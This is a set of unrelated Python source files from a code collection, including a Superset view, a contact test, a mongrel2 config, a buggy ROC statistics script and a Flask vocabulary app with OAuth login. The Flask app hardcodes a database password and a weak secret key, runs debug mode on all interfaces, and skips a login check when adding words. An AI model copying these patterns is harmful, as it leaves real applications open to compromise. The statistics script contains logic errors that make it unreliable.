to_time = request.args.get("to")
query = db.session.query(Query)
if search_user_id:
# Filter on user_id
query = query.filter(Query.user_id == search_user_id)
if database_id:
# Filter on db Id
query = query.filter(Query.database_id == database_id)
if status:
# Filter on status
query = query.filter(Query.status == status)
if search_text:
# Filter on search text
query = query.filter(Query.sql.like(f"%{search_text}%"))
if from_time:
query = query.filter(Query.start_time > int(from_time))
if to_time:
query = query.filter(Query.start_time < int(to_time))
query_limit = config["QUERY_SEARCH_LIMIT"]
sql_queries = query.order_by(Query.start_time.asc()).limit(query_limit).all()
dict_queries = [q.to_dict() for q in sql_queries]
return Response(
json.dumps(dict_queries, default=utils.json_int_dttm_ser),
status=200,
mimetype="application/json",
)
@app.errorhandler(500)
def show_traceback(self) -> FlaskResponse: # pylint: disable=no-self-use
return (
render_template("superset/traceback.html", error_msg=get_error_msg()),
500,
)
@event_logger.log_this
@expose("/welcome/")
def welcome(self) -> FlaskResponse:
"""Personalized welcome page"""
if not g.user or not g.user.get_id():
if conf["PUBLIC_ROLE_LIKE"]:
return self.render_template("superset/public_welcome.html")
return redirect(appbuilder.get_url_for_login)
welcome_dashboard_id = (
db.session.query(UserAttribute.welcome_dashboard_id)
.filter_by(user_id=g.user.get_id())
.scalar()
)
if welcome_dashboard_id:
return self.dashboard(dashboard_id_or_slug=str(welcome_dashboard_id))
payload = {
"user": bootstrap_user_data(g.user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/spa.html",
entry="spa",
bootstrap_data=json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
),
)
@has_access
@event_logger.log_this
@expose("/profile/<username>/")
def profile(self, username: str) -> FlaskResponse:
"""User profile page"""
user = (
db.session.query(ab_models.User).filter_by(username=username).one_or_none()
)
if not user:
abort(404, description=f"User: {username} does not exist.")
payload = {
"user": bootstrap_user_data(user, include_perms=True),
"common": common_bootstrap_payload(),
}
return self.render_template(
"superset/basic.html",
title=_("%(user)s's profile", user=username).__str__(),
entry="profile",
bootstrap_data=json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
),
)
@staticmethod
def _get_sqllab_tabs(user_id: int) -> Dict[str, Any]:
# send list of tab state ids
tabs_state = (
db.session.query(TabState.id, TabState.label)
.filter_by(user_id=user_id)
.all()
)
tab_state_ids = [str(tab_state[0]) for tab_state in tabs_state]
# return first active tab, or fallback to another one if no tab is active
active_tab = (
db.session.query(TabState)
.filter_by(user_id=user_id)
.order_by(TabState.active.desc())
.first()
)
databases: Dict[int, Any] = {}
for database in DatabaseDAO.find_all():
databases[database.id] = {
k: v for k, v in database.to_json().items() if k in DATABASE_KEYS
}
databases[database.id]["backend"] = database.backend
queries: Dict[str, Any] = {}
# These are unnecessary if sqllab backend persistence is disabled
if is_feature_enabled("SQLLAB_BACKEND_PERSISTENCE"):
# return all user queries associated with existing SQL editors
user_queries = (
db.session.query(Query)
.filter_by(user_id=user_id)
.filter(Query.sql_editor_id.in_(tab_state_ids))
.all()
)
queries = {
query.client_id: dict(query.to_dict().items()) for query in user_queries
}
return {
"tab_state_ids": tabs_state,
"active_tab": active_tab.to_dict() if active_tab else None,
"databases": databases,
"queries": queries,
}
@has_access
@event_logger.log_this
@expose("/sqllab/", methods=["GET", "POST"])
def sqllab(self) -> FlaskResponse:
"""SQL Editor"""
payload = {
"defaultDbId": config["SQLLAB_DEFAULT_DBID"],
"common": common_bootstrap_payload(),
**self._get_sqllab_tabs(g.user.get_id()),
}
form_data = request.form.get("form_data")
if form_data:
try:
payload["requested_query"] = json.loads(form_data)
except json.JSONDecodeError:
pass
payload["user"] = bootstrap_user_data(g.user, include_perms=True)
bootstrap_data = json.dumps(
payload, default=utils.pessimistic_json_iso_dttm_ser
)
return self.render_template(
"superset/basic.html", entry="sqllab", bootstrap_data=bootstrap_data
)
@has_access
@event_logger.log_this
@expose("/sqllab/history/", methods=["GET"])
@event_logger.log_this
def sqllab_history(self) -> FlaskResponse:
return super().render_app_template()
@api
@has_access_api
@event_logger.log_this
@expose("/schemas_access_for_file_upload")
def schemas_access_for_file_upload(self) -> FlaskResponse:
"""
This method exposes an API endpoint to
get the schema access control settings for file upload in this database
"""
if not request.args.get("db_id"):
return json_error_response("No database is allowed for your file upload")
db_id = int(request.args["db_id"])
database = db.session.query(Database).filter_by(id=db_id).one()
try:
schemas_allowed = database.get_schema_access_for_file_upload()
if security_manager.can_access_database(database):
return self.json_response(schemas_allowed)
# the list schemas_allowed should not be empty here
# and the list schemas_allowed_processed returned from security_manager
# should not be empty either,
# otherwise the database should have been filtered out
# in CsvToDatabaseForm
schemas_allowed_processed = security_manager.get_schemas_accessible_by_user(
database, schemas_allowed, False
)
return self.json_response(schemas_allowed_processed)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
return json_error_response(
"Failed to fetch schemas allowed for csv upload in this database! "
"Please contact your Superset Admin!"
)
|
the-stack_106_22047
|
from model.contact import Contact
from random import randrange
#def test_modify_first_contact_firstname(app):
# if app.contact.contact_count() == 0:
# app.contact.create_contact(Contact(firstname="для модификации контакта"))
# old_contacts_list = app.contact.get_contact_list()
# contact = Contact(firstname="NewName1")
# contact.id = old_contacts_list[0].id
# app.contact.modify_first_contact(contact)
# assert len(old_contacts_list) == app.contact.contact_count(), "Длина списка контактов не равна после модификации"
# new_contact_list = app.contact.get_contact_list()
# old_contacts_list[0] = contact
# assert sorted(old_contacts_list, key=Contact.id_or_max) == sorted(new_contact_list, key=Contact.id_or_max)
def test_modify_some_contact_firstname(app, db, check_ui):
if len(db.get_db_contact_list()) == 0:
app.contact.create_contact(Contact(firstname="для модификации контакта"))
old_contacts_list = db.get_db_contact_list()
index = randrange(len(old_contacts_list))
contact = Contact(firstname="NewName1")
contact.id = old_contacts_list[index].id
app.contact.modify_some_contact_by_id(contact.id, contact)
assert len(old_contacts_list) == app.contact.contact_count(), "Длина списка контактов не равна после модификации"
new_contact_list = db.get_db_contact_list()
old_contacts_list[index] = contact
assert sorted(old_contacts_list, key=Contact.id_or_max) == sorted(new_contact_list, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contact_list, key=Contact.id_or_max) == sorted(app.group.get_contact_list(),
key=Contact.id_or_max)
|
the-stack_106_22051
|
from mongrel2.config import *
main = Server(
uuid="f400bf85-4538-4f7a-8908-67e313d515c2",
access_log="/logs/access.log",
error_log="/logs/error.log",
chroot="./",
default_host="localhost",
name="test",
pid_file="/run/mongrel2.pid",
port=6767,
hosts = [
Host(name="localhost", routes={
r'/tests/': Dir(base='tests/', index_file='index.html',
default_ctype='text/plain')
})
]
)
commit([main])
|
the-stack_106_22052
|
"""
This is PISACov, a program designed to infer quaternary structure
of proteins from evolutionary covariance.
"""
from pisacov import __prog__, __description__, __version__
from pisacov import __author__, __date__, __copyright__
__script__ = 'PISACov Statistical Analysis script'
from pisacov import command_line as pcl
from pisacov.iomod import paths as ppaths
import argparse
import datetime
import os
import csv
logger = None
def create_argument_parser():
"""Create a parser for the command line arguments used in pisacov_stats."""
parser = argparse.ArgumentParser(prog=__prog__, formatter_class=argparse.RawDescriptionHelpFormatter,
description=__description__+' ('+__prog__+') v.'+__version__ + os.linesep + __doc__,
epilog="Check pisacov.rtfd.io for more information.")
subparsers = parser.add_subparsers(help='sub-command help')
parser_rocs = subparsers.add_parser('rocs', help='Produce Receiver operating characteristic (ROC) curves for the data provided.')
parser_rocs.add_argument('scores', nargs=1, metavar=("ScoresCSVFile"),
help="Input scores CSV filepath.")
parser_rocs.add_argument("-f", "--full_score_analysis", action='store_true',
default=False,
help="Produce full analysis of beta score list (beta score list required).")
parser.add_argument("-o", "--outdir", nargs=1, metavar="Output_Directory",
help="Set output directory path. If not supplied, default is the one containing the input data.")
parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
return parser
def main():
parser = create_argument_parser()
args = parser.parse_args()
global logger
logger = pcl.pisacov_logger(level="info")
welcomemsg, starttime = pcl.welcome(command=__script__)
logger.info(welcomemsg)
csvfile = ppaths.check_path(args.scores[0], 'file')
outdir = ppaths.check_path(args.outdir)
ppaths.mdir(outdir)
# Parsing scores
scores = {}
names = None
thraw = {}
with open(csvfile, 'r') as fin:
scoresin = csv.reader(fin)
for entry in scoresin:
if entry[0][0] != "#":
if (names is None or isinstance(names, str) or
(isinstance(names, list) and
len(names) != len(entry))):
names = []
for n in range(len(entry)):
names.append('sc_'+str(n+1))
else:
if thraw == {}:
for name in names[13:-1]:
thraw[name] = []
if entry[0] not in scores:
scores[entry[0]] = {}
if entry[1] not in scores[entry[0]]:
scores[entry[0]][entry[1]] = []
for sc in (entry.split(sep=', ')[13:-1]):
scores[entry[0]][entry[1]].append(float(sc))
if (entry.split(sep=', ')[-1]) == 'True' or '1':
scores[entry[0]][entry[1]].append(True)
elif (entry.split(sep=', ')[-1]) == 'False' or '0':
scores[entry[0]][entry[1]].append(False)
for n in range(len(names)):
thraw[names[n]].append(scores[entry[0]][entry[1]][n])
else:
if entry.split(sep=', ')[13:] == scores[entry[0]][entry[1]]:
pass
else:
raise ValueError('CSV file contains different values for same interface.')
else:
names = entry[1:].split(sep=', ')
# Setting thresholds
thr = {}
FPR = {}
TPR = {}
for key, value in thraw.items():
thr[key] = list(set(thraw)).sort()
FPR[key] = []
TPR[key] = []
for t in thr[key]:
FP = 0
TP = 0
FN = 0
TN = 0
for pdbid in scores:
for iface in scores[pdbid]:
stable = scores[pdbid][iface][-1]
for n in range(len(names)):
if scores[pdbid][iface][n] < t:
if stable is True:
FN += 1
else:
TN += 1
else:
if stable is True:
TP += 1
else:
FP += 1
FPR[key].append(FP/(FP+TN))
TPR[key].append(TP/(TP+FN))
fnameout = os.path.join(outdir, (key +
os.path.splitext(os.path.basename(csvfile))[0] +
'roc.dat'))
with open(fnameout, 'w') as fout:
for n in range(len(FPR[key])):
fout.write(str(FPR[key][n]) + ' ' + str(TPR[key][n]))
endmsg = pcl.ok(starttime, command=__script__)
logger.info(endmsg)
return
if __name__ == "__main__":
import sys
import traceback
try:
main()
logger.info(pcl.ok())
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
|
the-stack_106_22055
|
from flask import Flask
from flask import render_template
from flask import redirect
from flask import request
from flask import url_for
from flask import flash
from flask import jsonify
from flask import session as login_session
from flask import abort
from flask import make_response
from flask_wtf.csrf import CSRFProtect
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
from database_setup import Base, User, Language, Word
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import random
import string
import httplib2
import json
import requests
app = Flask(__name__)
engine = create_engine('postgresql+psycopg2://vagrant:wlapaella@localhost:5432/morewords')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
csrf = CSRFProtect(app)
@app.route('/')
@app.route('/vocabulary/', methods=['GET'])
def vocabulary():
"""Return the main page with all languages and latest words."""
languages = session.query(Language).order_by('name').all()
latest_words = session.query(Word).order_by('id desc').limit(10)
is_user_logged_in = True if 'username' in login_session else False
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
return render_template('vocabulary.html', **context)
@app.route('/vocabulary/languages', methods=['GET'])
def language_list():
"""Return the page to manage all languages."""
languages = session.query(Language).order_by('name').all()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'languages': languages,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('language_list.html', **context)
@app.route('/vocabulary/language/add/', methods=['GET', 'POST'])
def language_add():
"""Return the page to add a language."""
is_user_logged_in = True if 'username' in login_session else False
context = {'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_logged_in:
flash('You have to log in to add a language.')
return render_template('language_add.html', **context)
new_language = Language(name=request.form['name'].lower(),
user_id=login_session['user_id'])
session.add(new_language)
session.commit()
flash("New Language Created!")
return redirect(url_for('vocabulary'))
else:
if not is_user_logged_in:
flash('You have to log in to add a language.')
return render_template('language_add.html', **context)
@app.route('/vocabulary/<int:language_id>/edit/', methods=['GET', 'POST'])
def language_edit(language_id):
"""Return the page to edit the given language."""
to_edit = session.query(Language).filter_by(id=language_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_edit.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = ('Sorry, you don\'t have permission '
'to edit this language.')
context = {'to_edit': to_edit,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('language_edit.html', **context)
to_edit.name = request.form['name'].lower()
session.add(to_edit)
session.commit()
flash("Language Saved!")
return redirect(url_for('vocabulary'))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('language_edit.html', **context)
@app.route('/vocabulary/<int:language_id>/delete/', methods=['GET', 'POST'])
def language_delete(language_id):
"""Return the page to delete the given language."""
to_delete = session.query(Language).filter_by(id=language_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_delete.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
message = 'Sorry, you don\'t have permission to delete this language.'
context = {'to_delete': to_delete,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(message)
return render_template('language_delete.html', **context)
words = session.query(Word).filter_by(language_id=language_id).count()
if words > 0:
flash('Sorry, there are words saved in this language, '
'you can\'t delete it.')
return redirect(url_for('vocabulary'))
session.delete(to_delete)
session.commit()
flash("Language Deleted!")
return redirect(url_for('vocabulary'))
else:
if not is_user_authorized:
flash(message)
return render_template('language_delete.html', **context)
@app.route('/vocabulary/<int:language_id>/words/', methods=['GET'])
def word_list(language_id):
"""Return the page with all words in the given language."""
language = session.query(Language).filter_by(id=language_id).one()
words = (session.query(Word).filter_by(language_id=language_id).
order_by('name').all())
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'language': language,
'words': words,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('word_list.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/', methods=['GET'])
def word_detail(language_id, word_id):
"""Return the detail page of the given word."""
word = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in:
user = session.query(User).filter_by(id=login_session['user_id']).one()
else:
user = None
context = {'word': word,
'is_user_logged_in': is_user_logged_in,
'user': user}
return render_template('word_detail.html', **context)
@app.route('/vocabulary/word/add/', methods=['GET', 'POST'])
def word_add(language_id=None):
"""Return the page to add a word."""
languages = session.query(Language).all()
is_user_logged_in = True if 'username' in login_session else False
if len(languages) == 0:
flash('You should add a language first.')
return redirect(url_for('vocabulary'))
if request.method == 'POST':
language_id = request.form['language']
language = session.query(Language).filter_by(id=language_id).one()
new_word = Word(name=request.form['name'].lower(),
translation=request.form['translation'],
notes=request.form['notes'],
language=language,
user_id=login_session['user_id'])
session.add(new_word)
session.commit()
flash("New Word Created!")
return redirect(url_for('word_list', language_id=language.id))
else:
context = {'languages': languages,
'is_user_logged_in': is_user_logged_in}
return render_template('word_add.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/edit/',
methods=['GET', 'POST'])
def word_edit(language_id, word_id):
"""Return the page to edit the given word."""
languages = session.query(Language).all()
language = session.query(Language).filter_by(id=language_id).one()
to_edit = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_edit.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = 'Sorry, you don\'t have permission to edit this word.'
context = {'languages': languages,
'language': language,
'to_edit': to_edit,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_edit.html', **context)
to_edit.name = request.form['name'].lower()
to_edit.translation = request.form['translation']
to_edit.notes = request.form['notes']
if request.form.get('is_learned'):
to_edit.is_learned = True
else:
to_edit.is_learned = False
session.add(to_edit)
session.commit()
flash("Word Saved!")
context = {'language_id': language.id,
'word_id': to_edit.id}
return redirect(url_for('word_detail', **context))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_edit.html', **context)
@app.route('/vocabulary/<int:language_id>/<int:word_id>/delete/',
methods=['GET', 'POST'])
def word_delete(language_id, word_id):
"""Return the page to delete the given word."""
language = session.query(Language).filter_by(id=language_id).one()
to_delete = session.query(Word).filter_by(id=word_id).one()
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and to_delete.user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
no_permission_msg = ('Sorry, you don\'t have permission '
'to delete this word.')
context = {'to_delete': to_delete,
'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_delete.html', **context)
session.delete(to_delete)
session.commit()
flash("Word Deleted!")
return redirect(url_for('word_list', language_id=language_id))
else:
if not is_user_authorized:
flash(no_permission_msg)
return render_template('word_delete.html', **context)
# List of user words to learn
@app.route('/vocabulary/<int:language_id>/<int:user_id>/review',
methods=['GET'])
def personal_review(user_id, language_id):
"""Return a page with all words with is_learned==False."""
language = session.query(Language).filter_by(id=language_id).one()
words = session.query(Word).filter_by(language_id=language_id,
user_id=user_id,
is_learned=False)
is_user_logged_in = True if 'username' in login_session else False
if is_user_logged_in and user_id == login_session['user_id']:
is_user_authorized = True
else:
is_user_authorized = False
context = {'is_user_authorized': is_user_authorized,
'is_user_logged_in': is_user_logged_in,
'language': language,
'words': words}
if not is_user_authorized:
flash('Sorry, you don\'t have permission to see this page.')
return render_template('personal_review.html', **context)
# SIGNUP, LOGIN AND LOGOUT
@app.route('/signup', methods=['GET', 'POST'])
def signup():
"""Return the page to sign up without using Google or Facebook."""
is_user_logged_in = True if 'username' in login_session else False
context = {'is_user_logged_in': is_user_logged_in}
if request.method == 'POST':
new_user = User(username=request.form['username'],
email=request.form['email'],
picture=None)
new_user.hash_password(request.form['password'])
session.add(new_user)
session.commit()
languages = session.query(Language).order_by('name').all()
latest_words = session.query(Word).order_by('id desc').limit(10)
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
flash('Hi %s, you have successfully registered.' % new_user.username)
flash('Log in to use morewords.')
return render_template('vocabulary.html', **context)
return render_template('signup.html', **context)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Return the page with all login options."""
is_user_logged_in = True if 'username' in login_session else False
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
for x in xrange(32))
login_session['state'] = state
context = {'is_user_logged_in': is_user_logged_in,
'STATE': state}
if request.method == 'POST':
user_email = request.form['email']
user_id = get_user_id(user_email)
user_password = request.form['password']
if user_id:
user = session.query(User).filter_by(id=user_id).one()
if user.verify_password(user_password):
login_session['user_id'] = user.id
login_session['username'] = user.username
login_session['email'] = user.email
login_session['picture'] = None
login_session['provider'] = 'morewords'
is_user_logged_in = True
languages = session.query(Language).order_by('name').all()
latest_words = (session.query(Word).order_by('id desc').
limit(10))
context = {'languages': languages,
'latest_words': latest_words,
'is_user_logged_in': is_user_logged_in}
flash('Hello %s!' % user.username)
return render_template('vocabulary.html', **context)
flash('Email or password incorrect. Try again.')
return render_template('login.html', **context)
@app.route('/gconnect', methods=['POST'])
def gconnect():
"""Connect with Google OAuth service to login a Google user."""
# Validate state token
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Obtain authorization code
code = request.data
try:
# Upgrade the authorization code into a credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = (make_response(
json.dumps('Failed to upgrade the authorization code.'),
401))
response.headers['Content-Type'] = 'application/json'
return response
# Check that the access token is valid.
access_token = credentials.access_token
url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'
% access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# If there was an error in the access token info, abort.
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is used for the intended user.
gplus_id = credentials.id_token['sub']
if result['user_id'] != gplus_id:
response = (make_response(
json.dumps("Token's user ID doesn't match given user ID."),
401))
response.headers['Content-Type'] = 'application/json'
return response
# Verify that the access token is valid for this app.
CLIENT_ID = json.loads(
open('client_secrets.json', 'r').read())['web']['client_id']
if result['issued_to'] != CLIENT_ID:
response = (make_response(
json.dumps("Token's client ID does not match app's."),
401))
response.headers['Content-Type'] = 'application/json'
return response
stored_access_token = login_session.get('access_token')
stored_gplus_id = login_session.get('gplus_id')
if stored_access_token is not None and gplus_id == stored_gplus_id:
response = (make_response(
json.dumps('Current user is already connected.'), 200))
response.headers['Content-Type'] = 'application/json'
return response
# Store the access token in the session for later use.
login_session['access_token'] = credentials.access_token
login_session['gplus_id'] = gplus_id
# Get user info
userinfo_url = "https://www.googleapis.com/oauth2/v1/userinfo"
params = {'access_token': credentials.access_token, 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = answer.json()
login_session['provider'] = 'google'
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
# see if user exists, if not make a new one
user_id = get_user_id(login_session['email'])
if not user_id:
user_id = create_user(login_session)
login_session['user_id'] = user_id
flash("Hello %s!" % login_session['username'])
return str(login_session)
@app.route('/fbconnect', methods=['POST'])
def fbconnect():
"""Connect with Facebook OAuth service to login a Facebook user."""
if request.args.get('state') != login_session['state']:
response = make_response(json.dumps('Invalid state parameter.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
access_token = request.data
app_id = (json.loads(open('fb_client_secrets.json', 'r').
read())['web']['app_id'])
app_secret = (json.loads(
open('fb_client_secrets.json', 'r').
read())['web']['app_secret'])
url = 'https://graph.facebook.com/oauth/access_token?grant_type=fb_exchange_token&client_id=%s&client_secret=%s&fb_exchange_token=%s' % ( # nopep8
app_id, app_secret, access_token)
h = httplib2.Http()
result = h.request(url, 'GET')[1]
userinfo_url = "https://graph.facebook.com/v3.2/me"
'''
Due to the formatting for the result from the server
token exchange we have to split the token first on
commas and select the first index which gives us the
key : value for the server access token then we split
it on colons to pull out the actual token value and
replace the remaining quotes with nothing so that
it can be used directly in the graph api calls
'''
token = result.split(',')[0].split(':')[1].replace('"', '')
# Get user data
url = 'https://graph.facebook.com/v3.2/me?access_token=%s&fields=name,id,email' % token # nopep8
h = httplib2.Http()
result = h.request(url, 'GET')[1]
data = json.loads(result)
login_session['provider'] = 'facebook'
login_session['username'] = data["name"]
login_session['email'] = data["email"]
login_session['facebook_id'] = data["id"]
login_session['access_token'] = token
# Get user picture
url = 'https://graph.facebook.com/v3.2/me/picture?access_token=%s&redirect=0&height=200&width=200' % token # nopep8
h = httplib2.Http()
result = h.request(url, 'GET')[1]
data = json.loads(result)
login_session['picture'] = data["data"]["url"]
# See if user exists, if not make a new one
user_id = get_user_id(login_session['email'])
if not user_id:
user_id = create_user(login_session)
login_session['user_id'] = user_id
flash("Hello %s!" % login_session['username'])
return str(login_session)
@app.route('/gdisconnect')
def gdisconnect():
"""Disconnect a Google user."""
# Only disconnect a connected user.
access_token = login_session.get('access_token')
if access_token is None:
response = (make_response(
json.dumps('Current user not connected.'), 401))
response.headers['Content-Type'] = 'application/json'
return response
url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % access_token
h = httplib2.Http()
result = h.request(url, 'GET')[0]
if result['status'] == '200':
response = (make_response(
json.dumps('Successfully disconnected.'), 200))
response.headers['Content-Type'] = 'application/json'
return response
else:
response = (make_response(
json.dumps('Failed to revoke token for given user.'), 400))
response.headers['Content-Type'] = 'application/json'
return response
# Facebook disconnect
@app.route('/fbdisconnect')
def fbdisconnect():
"""Disconnect a Facebook user."""
facebook_id = login_session['facebook_id']
access_token = login_session['access_token']
url = ('https://graph.facebook.com/%s/permissions?access_token=%s' %
(facebook_id, access_token))
h = httplib2.Http()
h.request(url, 'DELETE')[1]
return
@app.route('/disconnect')
def disconnect():
"""Disconnect users based on provider."""
if 'provider' in login_session:
if login_session['provider'] == 'google':
gdisconnect()
del login_session['gplus_id']
del login_session['access_token']
if login_session['provider'] == 'facebook':
fbdisconnect()
del login_session['facebook_id']
del login_session['username']
del login_session['email']
del login_session['picture']
del login_session['user_id']
del login_session['provider']
flash("You have successfully been logged out.")
return redirect(url_for('vocabulary'))
else:
flash("You were not logged in")
return redirect(url_for('vocabulary'))
# API Endpoint
@app.route('/api/v0/vocabulary', methods=['GET'])
def vocabulary_json():
"""List all words grouped by language."""
languages = session.query(Language).all()
serialized_languages = [l.serialize for l in languages]
for i in range(len(serialized_languages)):
words = (session.query(Word).
filter_by(language_id=serialized_languages[i]["id"]).all())
serialized_words = [w.serialize for w in words]
serialized_languages[i]["Words"] = serialized_words
return jsonify(Vocabulary=serialized_languages)
@app.route('/api/v0/languages', methods=['GET'])
def language_list_json():
"""List all languages."""
languages = session.query(Language).all()
return jsonify(Languages=[l.serialize for l in languages])
@app.route('/api/v0/words', methods=['GET'])
def word_list_json():
"""List all words."""
words = session.query(Word).all()
return jsonify(Words=[w.serialize for w in words])
@app.route('/api/v0/languages/<string:language_name>/words', methods=['GET'])
def language_word_list_json(language_name):
"""List all words in the given language."""
language = session.query(Language).filter_by(name=language_name).one()
words = session.query(Word).filter_by(language_id=language.id)
return jsonify(Words=[w.serialize for w in words])
@app.route('/api/v0/languages/<string:language_name>/words/<string:word_name>',
methods=['GET'])
def language_word_json(language_name, word_name):
"""List all entries for a given word in the given language."""
language = session.query(Language).filter_by(name=language_name).one()
word_query = session.query(Word).filter_by(language_id=language.id,
name=word_name)
return jsonify(Word=[w.serialize for w in word_query])
@app.route('/api/v0/words/<string:word_name>', methods=['GET'])
def word_json(word_name):
"""List all entries for the given word in any language."""
word_query = session.query(Word).filter_by(name=word_name)
return jsonify(Word=[w.serialize for w in word_query])
def create_user(login_session):
"""Helper function that creates a user."""
new_user = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(new_user)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).one()
return user.id
def get_user_id(email):
"""Helper function that retrieves a user id from the given email."""
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except NoResultFound:
return None
if __name__ == '__main__':
app.secret_key = "super_secret_key"
app.debug = True
app.run(host='0.0.0.0', port=5000)
|
the-stack_106_22058
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Functions useful for dealing with hexagonal tilings.
For more information on the concepts employed here, see this informative page
https://www.redblobgames.com/grids/hexagons/
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from typing import Any, Tuple
# External imports
import numpy as np
# Bokeh imports
from .dependencies import import_required
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'axial_to_cartesian',
'cartesian_to_axial',
'hexbin',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def axial_to_cartesian(q: Any, r: Any, size: float, orientation: str, aspect_scale: float = 1) -> Tuple[Any, Any]:
''' Map axial *(q,r)* coordinates to cartesian *(x,y)* coordinates of
tiles centers.
This function can be useful for positioning other Bokeh glyphs with
cartesian coordinates in relation to a hex tiling.
This function was adapted from:
https://www.redblobgames.com/grids/hexagons/#hex-to-pixel
Args:
q (array[float]) :
A NumPy array of q-coordinates for binning
r (array[float]) :
A NumPy array of r-coordinates for binning
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str) :
Whether the hex tile orientation should be "pointytop" or
"flattop".
aspect_scale (float, optional) :
Scale the hexagons in the "cross" dimension.
For "pointytop" orientations, hexagons are scaled in the horizontal
direction. For "flattop", they are scaled in vertical direction.
When working with a plot with ``aspect_scale != 1``, it may be
useful to set this value to match the plot.
Returns:
(array[int], array[int])
'''
if orientation == "pointytop":
x = size * np.sqrt(3) * (q + r/2.0) / aspect_scale
y = -size * 3/2.0 * r
else:
x = size * 3/2.0 * q
y = -size * np.sqrt(3) * (r + q/2.0) * aspect_scale
return (x, y)
def cartesian_to_axial(x: Any, y: Any, size: float, orientation: str, aspect_scale: float = 1) -> Tuple[Any, Any]:
''' Map Cartesion *(x,y)* points to axial *(q,r)* coordinates of enclosing
tiles.
This function was adapted from:
https://www.redblobgames.com/grids/hexagons/#pixel-to-hex
Args:
x (array[float]) :
A NumPy array of x-coordinates to convert
y (array[float]) :
A NumPy array of y-coordinates to convert
size (float) :
The size of the hexagonal tiling.
The size is defined as the distance from the center of a hexagon
to the top corner for "pointytop" orientation, or from the center
to a side corner for "flattop" orientation.
orientation (str) :
Whether the hex tile orientation should be "pointytop" or
"flattop".
aspect_scale (float, optional) :
Scale the hexagons in the "cross" dimension.
For "pointytop" orientations, hexagons are scaled in the horizontal
direction. For "flattop", they are scaled in vertical direction.
When working with a plot with ``aspect_scale != 1``, it may be
